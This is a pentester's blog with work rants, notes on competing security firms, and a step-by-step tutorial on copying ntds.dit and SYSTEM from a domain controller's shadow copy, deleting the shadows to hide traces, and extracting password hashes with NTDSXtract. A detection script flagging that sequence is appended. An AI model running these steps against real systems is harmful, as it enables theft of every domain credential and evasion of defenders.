Bahrain – Working for another manager is trying my patience

Well, I am almost done with my small tour in Bahrain, and will be glad to be home. I will miss some of the people; they are great and were a joy to work with.

As for the project that my company is contracted on, I am a little pissed that nothing has really been done since I last left from working over here. Well, none of the projects that we were supposed to be working on. Many of the other vendors that had projects have finished, or are scheduled to finish, their projects. It seems that the manager in charge has either not worried about the project or is clueless that his employees are lying to him.

The two people that were hired to come over here and work for the last year, who are not security-minded people by the way, did almost nothing during the time they were over here. From what I can tell, it looks like they relied on other vendors to do most of the work and took all of the credit for it. Most of the projects are not even actually started, but are marked as partially complete. I have been working on a Bit9 installation for a couple of weeks; there are 1200+ workstations in the environment, and only 130 systems have the software installed. There are no real policies defined, and only two workstations are locked down. The manager believes that all systems have the software installed and they are completely protected. I tried to let him know, and he did not seem to want to hear it. I dropped the conversation and began working on a solution to the issue.

I am ready to get back to pentesting, where I can actually do some good; well, I will keep telling myself that. Many of my customers just want a band-aid to cover over the problems and not really work on fixing things, but I still get to have fun in the process.

Posted in 2014, Bahrain, Rants, Security, Travel

Heading back to Bahrain for my 3rd Trip

Heading out Monday July 21st to Bahrain for another 45 days of excitement. My company had been renting an apartment since last year, but they let the lease lapse, so I will be staying in the Marriott for the stay. Which is fine with me; I like getting the points, and plus it has free breakfast. I guess they are expecting me to look for another apartment to rent; not sure why the last person who was there did not do this, since he works on the project full time (or is supposed to).

Not sure what I will be working on this time around, since I have not been involved with this project since last year when I was there. I have had little information given to me by the director of this project, and the employees assigned to the director of this project have been little help in giving me information.

Did not really want to head back, but my boss sort of gave me a “you do not really have an option” speech. I was supposed to be heading to Defcon during this time frame and told him I would prefer to do that rather than go to Bahrain. I was then told that was not a good reason to not go on the trip, and something like “I cannot justify you going to training instead of this trip” or something similar to that. This did not really make me happy. They originally wanted me to go for 90 days, but I had to do military duty, so I could only squeeze in the 45 days to go (well, that is what I told them). Not like they could really argue about me not being able to go, since it is the federal government and all.

I was surprised that they were expecting me to go to cover this time frame for the project, but it seems that one of the two people they hired does not want to go back over there anymore. I was a little pissed about that, and think they need to fire him since he was specifically hired to do this project. Sure that will not happen, since they have him doing training for Alien Vault software occasionally.

This is partly one reason I started researching penetration testing companies. I have found a few I like, but I am not sure if I will be looking for a new place to work just yet. I need to see if they are expecting me to make more trips back to Bahrain. I already told my director that I would not be heading back over again, so not to even ask me about it.

Posted in 2014, Bahrain, Military, Rants, Work

Pentesting Companies – Praetorian

I have been researching a few pentesting companies over the past few months, just to compare my current employer to others. I am happy at my current employer, I enjoy what I do, and most of the people I work with. I am just curious what other companies do for their employees, and what they require from them.

Through my research I noticed that many of them give fairly good benefits, and seem to have a relaxed work environment.

I was surprised that several require their employees to speak at conferences, write white papers, and do research. While I am not against any of this, I am wondering how they would have time to accomplish any of it. I am usually booked solid for weeks on end, with maybe a day or less of down time a month. Many also require 25% or more travel, which I am not opposed to either, but I generally do most of my assessments remotely. I have complained to my boss that we do not travel to customers enough. I prefer to have some face-to-face conversations with my customers to get a better understanding of their needs. Plus it makes it easier to social engineer information from someone.

I was fairly impressed with Praetorian, whose headquarters are in Austin, TX. They seem to have some very skilled and knowledgeable consultants, who are involved in the security community and open-source projects. They seem to be involved with the local college (University of Texas), holding career expos at UT. They also have some small puzzles that you can try to work. I will have to try these when I get some spare time.

A Job Posting for a “Senior Security Consultant (Software)”

Qualifications: Successful candidates should have:

  1. 2-5 years of information security experience
  2. 1-2 years of consulting experience
  3. Strong understanding of software and application security
  4. Experience with languages such as C, C++, Java, .NET, Ruby, and Python
  5. Strong oral and written communication skills
  6. Involvement in software community via OWASP, WASC, and/or open source development highly desirable
  7. Track record speaking at major security conferences such as OWASP Appsec, SANS Appsec, and Blackhat highly desirable
  8. Ability to travel 10% of the time
  9. Minimum 4-Year Bachelor of Science Degree in Computer Science, Engineering, or equivalent from a “top ten” institution.

While the travel is a lot less than at many of the other companies, they require a person who is good at public speaking at large conferences and is involved in the security community.

Well, I guess if I wanted to go and work for them, I would need to start speaking at conferences and get more involved in the security community. I am not really going back to college to get a degree from a “Top Ten” institution unless someone else is willing to pay for it.

Posted in 2014, Security, Work

Penetration Testing Companies

I have been doing a little research about penetration testing companies, not that I am looking at leaving my current employer, but I am curious about how other companies perform their network vulnerability assessments (NVA) and penetration tests (PT).

I decided to start by asking our marketing manager who our competition was, and was rather surprised that he did not really have an answer. He could not give me any companies that he thought were our competition; he knew of a few companies but not a specific competitor. This scares me a little: how can you not know who you are competing with and who you might be losing business to?

I know of several who I believe we are competing with; one is a former employee of the company who left and started his own security company. The others are the larger companies who have more resources and are recognized by major corporations as leaders in the industry.

During my research, I discovered that there are tons of companies that say they do NVA/PT assessments, along with other services that we do and many we do not. The companies ranged in size and services. Some only did security assessments while others did risk assessments, and many said they did PCI, HIPAA, and E3IPA compliance assessments.

I am working on correlating a list of companies that truly do penetration testing.

Some of the companies I am doing research on and consider to be possible competitors to my employer:

Dell SecureWorks

I know there are many more that I have not listed, but will get around to reviewing as many as I can in my spare time.

Posted in 2014, Security, Work

Getting Hashes from NTDS.dit file

I read a write-up from @Mubix about doing this and noticed that some changes had come to the NTDSXtract software which made things a little easier, so I decided to do a write-up on the two versions.

Why do you want to do this anyways?
The reason you would want to pull the ntds.dit file from a Domain Controller after you have compromised it is that you do not want to create a new Domain Administrator account (which could set off alerts) but still need password hashes, or you need the password for another account to access data you want (i.e. SQL Server accounts).

Get the ntds.dit and SYSTEM from Volume Shadow Copy on a Domain Controller

1. Vssadmin tool

1.1 List Volume Shadow Copies on the system:

Example: ‘vssadmin list shadows’ with no shadows available:

C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
No items found that satisfy the query.

1.2. Create a new Volume Shadow Copy of the current drive:

Example: ‘vssadmin create shadow’ for the C: drive:

C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for ‘c:\’
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

2. Pull files from the Volume Shadow copy

copy \\?\GLOBALROOT\Device\<SHADOWYCOPY DISK>\windows\<directory>\<File> <where to put file>
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

[X] refers to the shadow copy number; in the example above the latest version is HarddiskVolumeShadowCopy1 (there could be multiple copies; use the last one listed).

I would also recommend getting a current copy of SYSTEM from the registry just in case. I have had a couple of times where the SYSTEM file from the shadow copy was corrupt.

3. Delete the shadows to cover your tracks:

vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
vssadmin delete shadows /for=C: /shadow= e8eb7931-5056-4f7d-a5d7-05c30da3e1b3

4. Optional VSSOwn Script to help with this task:

5. Now that you have the files, it is time to get the hashes

5.1 Utilities needed:

  • libesedb
  • ntdsxtract

5.2 libesedb

Extract the files

# tar -xzvf libesedb-alpha-20120102.tar.gz

Compile/make libesedb

# cd libesedb-20120102
# ./configure
# make

Move the tools somewhere like ‘/usr/local/’ and change into that directory:

# mv esedbtools/ /usr/local
# cd /usr/local/esedbtools/

esedbexport usage:

Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source
source: the source file
-c:     codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h:     shows this help
-l:     logs information about the exported items
-m:     export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t:     specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T:     exports only a specific table
-v:     verbose output to stderr
-V:     print version

Run esedbexport to extract the ntds.dit data:

./esedbexport  -t  <Directory to export data to(will add .export to the end)> <ntds.dit file>
# ./esedbexport  -t ~/ntds ~/ntds.dit
esedbexport 20120102
Opening file.

Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

Extracted files:

# ls ~/ntds.export/

5.3 NTDSXtract:
# unzip
# cd NTDSXtract\ 1.0/

To update to the new 1.2 Beta version, unzip its contents inside the “NTDSXtract 1.0” directory
(you might want to rename the directory to just NTDSXtract):

# unzip

Usage (Version 1.0 and 1.2 Beta)

Ver 1.0

 # python
 Extracts information related to user objects
 usage: <datatable> <linktable> [option]
 --rid <user rid>
 List user identified by RID
 --name <user name>
 List user identified by Name
 --passwordhashes <system hive>
 Extract password hashes
 --passwordhistory <system hive>
 Extract password history
 Extract certificates
 --supplcreds <system hive>
 Extract kerberos keys
 List groups of which the user is a member

Ver 1.2

 # python ../NTDSXtract\ 1.0/ 
 DSUsers v1.2
 Extracts information related to user objects
 usage: ../NTDSXtract 1.0/ <datatable> <linktable> <work directory> [option]
 The path to the file called datatable extracted by esedbexport
 The path to the file called linktable extracted by esedbexport
 work directory
 The path to the directory where ntdsxtract should store its
 cache files and output files. If the directory does not exist
 it will be created.

 --rid <user rid>
 List user identified by RID
 --name <user name>
 List user identified by Name
     --syshive <path to system hive>
 Required for password hash and history extraction
 This option should be specified before the password hash
 and password history extraction options!
 --lmoutfile    <name of the LM hash output file>
 --ntoutfile      <name of the NT hash output file>
 --pwdformat  <format of the hash output>
 ophc - OphCrack format
 When this format is specified the NT output file will be used
 john - John The Ripper format
 Extract password hashes
 Extract password history
 Extract certificates
 Extract kerberos keys
 List groups of which the user is a member
 --csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the output

Extract user info:

Ver 1.0

# python ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 --passwordhashes ~/sys --passwordhistory ../sys
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 40933 records processed
Extracting schema information - 100% -> 4142 records processed
Extracting object links...

List of users:
Record ID:           1815
User name:           Administrator
User principal name: Administrator@DOMAIN
SAM Account name:    Administrator
GUID: 3543ea4c-f755-4758-97c0-3d63dffc96ad
SID:  S-1-5-21-657512695-1375287660-316888650-500
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 16:10:29
Account expires:      Never
Password last set:    2006-08-22 11:53:34.828125
Last logon:           2013-10-03 19:11:25.366397
Last logon timestamp: 2013-09-30 10:43:09.479359
Bad password time     2013-10-03 17:36:20.168265
Logon count:          65535
Bad password count:   0
User Account Control:
PWD Never Expires
$ROOT_OBJECT$ priv DOMAIN main Domain Admins Administrator
Password hashes:
Password history:
Record ID:           1816
User name:           Guest
User principal name:
SAM Account name:    Guest
GUID: 2e792141-c4be-43b2-a4f5-079e5d05e184
SID:  S-1-5-21-657512695-1375287660-316888650-501
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 15:19:28
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     2013-10-03 18:18:45.096975
Logon count:          0
Bad password count:   1
User Account Control:
PWD Not Required
PWD Never Expires
$ROOT_OBJECT$ priv DOMAIN main Users Guest
Password hashes:
Password history:

….(Continues for each Account)….

Ver 1.2 (Output in JTR Format)

python ~/ntds.export/datatable.3  ~/ntds.export/link_table.4 ~/TEMP  --passwordhashes --passwordhistory --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

List of users:
Record ID:           32777
User name:           joe smith
User principal name:
SAM Account name:    jsmith
GUID: 14c15e2a-8f7c-4404-a63c-cb6a4c689c00
SID:  S-1-5-21-349701255-3731294407-2303513147-3800
When created:         2005-06-01 13:50:37
When changed:         2013-12-12 15:08:12
Account expires:      Never
Password last set:    2013-10-07 13:20:19.146593
Last logon:           2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time     2013-12-11 00:04:52.446209
Logon count:          6239
Bad password count:   0
User Account Control:
$ROOT_OBJECT$ local DOMAIN JOB Users joe smith
Password hashes:

….(Continues for each Account)….

Version 1.2 allows you to extract the hashes into two files, one for LM hashes and the other for NT hashes, and currently supports two hash output formats: Ophcrack and John.
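A detection-side counterpart to steps 1 to 3 above, added here as an example and not part of the original post: it scans constructed process-creation records for the create-shadow, copy-credential-store-from-shadow, delete-shadows sequence and scores each host, so a domain controller showing the whole chain in a short window stands out from a backup job that only creates and removes snapshots. The tab-separated record layout and the sample host and user names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sample, not real telemetry. Tab-separated fields: timestamp, host,
# user, command line (this layout is an assumption, not any product's format).
SAMPLE_LOG = """\
2014-03-01T02:11:05\tDC01\tCORP\\svc_it\tvssadmin create shadow /for=c:
2014-03-01T02:11:40\tDC01\tCORP\\svc_it\tcmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\ntds\\ntds.dit c:\\temp\\
2014-03-01T02:11:52\tDC01\tCORP\\svc_it\tcmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\SYSTEM c:\\temp\\
2014-03-01T02:12:30\tDC01\tCORP\\svc_it\tvssadmin delete shadows /for=c: /shadow={e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
2014-03-01T03:00:00\tFS02\tCORP\\backupsvc\tvssadmin create shadow /for=d:
2014-03-01T03:05:00\tFS02\tCORP\\backupsvc\tvssadmin delete shadows /for=d: /all
"""

# One pattern per stage of the sequence the post walks through (steps 1-3).
STAGES = [
    ("create", re.compile(r"\bvssadmin\b.*\bcreate\s+shadow\b", re.I)),
    ("read", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*(ntds\.dit|config\\SYSTEM|config\\SAM)", re.I)),
    ("delete", re.compile(r"\bvssadmin\b.*\bdelete\s+shadows\b", re.I)),
]

def classify(cmd):
    """Return the stage a command line belongs to, or None if unrelated."""
    for name, rx in STAGES:
        if rx.search(cmd):
            return name
    return None

def analyze(log_text, window_s=3600):
    """Per host: critical = create + copy of ntds.dit/SYSTEM/SAM from the snapshot
    + delete within window_s; high = any such copy; low = create/delete only
    (normal backup behaviour, so baseline rather than alert)."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmd = line.split("\t", 3)
        stage = classify(cmd)
        if stage:
            hits[host].append((datetime.fromisoformat(ts), stage, user))
    report = {}
    for host, events in hits.items():
        events.sort()
        stages = {s for _, s, _ in events}
        span = (events[-1][0] - events[0][0]).total_seconds()
        if {"create", "read", "delete"} <= stages and span <= window_s:
            severity = "critical"
        elif "read" in stages:
            severity = "high"
        else:
            severity = "low"
        report[host] = {"severity": severity, "stages": sorted(stages),
                        "users": sorted({u for _, _, u in events})}
    return report
```

On real data, feed it process-creation events (command line plus host and user) and tune the window to how long your backup jobs keep a snapshot open.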

Posted in 2013, Hashes, Password, Security, Windows, Work